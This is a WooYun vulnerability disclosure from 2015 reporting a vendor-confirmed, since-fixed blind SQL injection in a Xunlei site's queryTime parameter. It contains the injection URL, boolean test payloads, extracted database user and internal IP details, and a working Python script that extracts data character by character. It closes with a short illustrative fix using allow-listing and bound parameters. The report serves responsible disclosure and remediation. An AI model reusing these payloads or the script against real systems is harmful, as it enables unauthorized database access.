
Vulnerability Summary

Defect ID: wooyun-2015-0141592

Title: Blind SQL injection in a 迅雷 (Xunlei) site

Vendor: 迅雷 (Xunlei)

Author: 星明月稀

Submitted: 2015-09-16 16:14

Fixed: 2015-10-31 17:50

Published: 2015-10-31 17:50

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-09-16: Details sent to the vendor; awaiting vendor handling
2015-09-16: Vendor confirmed; details visible to the vendor only
2015-09-26: Details opened to core white hats and domain experts
2015-10-06: Details opened to regular white hats
2015-10-16: Details opened to intern white hats
2015-10-31: Details opened to the public

Summary:

A 迅雷 (Xunlei) site has a blind SQL injection vulnerability.

Details:

Injection point (boolean-based blind):

http://dy.niu.xunlei.com/bonus/querytranstime.do?callback=jQuery18206999116327220966_1442386855464&queryTime=7_day) and 1=1 and (1=1&_=1442386855486

The condition appended to the queryTime parameter changes the response depending on whether it is true or false, which gives a boolean oracle:

(1) 1=1 (true)

[screenshot: 1=1.png]

(2) 1=111 (false)

[screenshot: 1=111.png]

(3) length(user())=18 (true)

[screenshot: length(user()).png]

Proof of concept:

Extracted character by character:

user(): yeyouser@10.1.3.40

database(): niux_jifen

Script attached; it must be run with the cookie of a logged-in 迅雷 (Xunlei) account:

#encoding=utf-8
# Python 2 script (httplib, print statements). Indentation restored from the report.
import httplib,time,string,sys,urllib
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36',
    'Cookie' : '***'
}
# character set tried at each position of user()
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')
print '[%s]Start to retrieve MySQL User():' % time.strftime('%H:%M:%S', time.localtime())
user = ''
base_url = "/bonus/querytranstime.do?callback=jQuery18206999116327220966_1442386855464&_=1442386855486&"
for i in range(1,19):  # length(user()) was determined to be 18 in step (3)
    for payload in payloads:
        conn = httplib.HTTPConnection('dy.niu.xunlei.com', timeout=6)
        #s = "cid=16 AND ascii(mid(user()from(%s)for(1)))=%s" % (i, ord(payload))
        s = "queryTime=7_day)+and+ascii(mid(user()from(%s)for(1)))=%s+and+(1=1" % (i,ord(payload))
        conn.request(method='GET',url = base_url + s,headers=headers)
        html_doc = conn.getresponse().read().decode('utf-8')
        conn.close()
        if html_doc.find(u'积分商城') > 0: # True: the normal page came back
            user += payload
            sys.stdout.write('\r[Retrieving]' + user)
            sys.stdout.flush()
            break
        else:
            print '.',
print '\n[Done]MySQL user() is ' + user
print time.strftime('%H:%M:%S', time.localtime())

Remediation:

Filter the input!
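The remediation above is a single line; as an added illustration that is not code from the report or from 迅雷 (Xunlei), here is the shape of a hardened handler for a queryTime-style parameter: an allow-list check on the value's format, then the value passed as a bound query parameter instead of being spliced into the SQL text. The table, columns, sample rows and the accepted pattern are assumptions made for the demo.

```python
import re
import sqlite3

# Allowed shape of the queryTime parameter, e.g. "7_day". This pattern is an
# assumption: the real set of values the endpoint accepts is not on the page.
QUERY_TIME_RE = re.compile(r"^([1-9]\d{0,2})_day$")


def parse_query_time(value):
    """Return the day count from a well-formed queryTime, or None if rejected."""
    m = QUERY_TIME_RE.match(value or "")
    return int(m.group(1)) if m else None


def setup_demo_db():
    """Constructed in-memory table standing in for the bonus/transfer data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE transfer (period TEXT, amount INTEGER)")
    conn.executemany("INSERT INTO transfer VALUES (?, ?)",
                     [("7_day", 10), ("7_day", 5), ("30_day", 40)])
    return conn


def query_trans_time(conn, query_time):
    """Hardened handler: allow-list check first, then a bound parameter.

    Returns the summed amount, or None when the input is rejected.
    """
    if parse_query_time(query_time) is None:
        return None
    # The value is bound, never concatenated into the SQL string, so a suffix
    # such as ") and 1=1 and (1=1" can only ever be compared as literal text.
    row = conn.execute(
        "SELECT COALESCE(SUM(amount), 0) FROM transfer WHERE period = ?",
        (query_time,),
    ).fetchone()
    return row[0]


def bound_literal_count(conn, value):
    """Even without the allow-list, a bound parameter is not parsed as SQL."""
    return conn.execute(
        "SELECT COUNT(*) FROM transfer WHERE period = ?", (value,)
    ).fetchone()[0]


if __name__ == "__main__":
    db = setup_demo_db()
    print(query_trans_time(db, "7_day"))
    print(query_trans_time(db, "7_day) and 1=1 and (1=1"))
    print(bound_literal_count(db, "7_day) and 1=1 and (1=1"))
```

Rejecting malformed values before the query also removes the true/false response difference that the report's oracle depends on, since every bad value takes the same error path.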

Copyright notice: when reposting, credit the source 星明月稀@乌云 (WooYun)


Vendor Response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-09-16 17:49

Vendor reply:

Thanks for the feedback!

Latest status:

None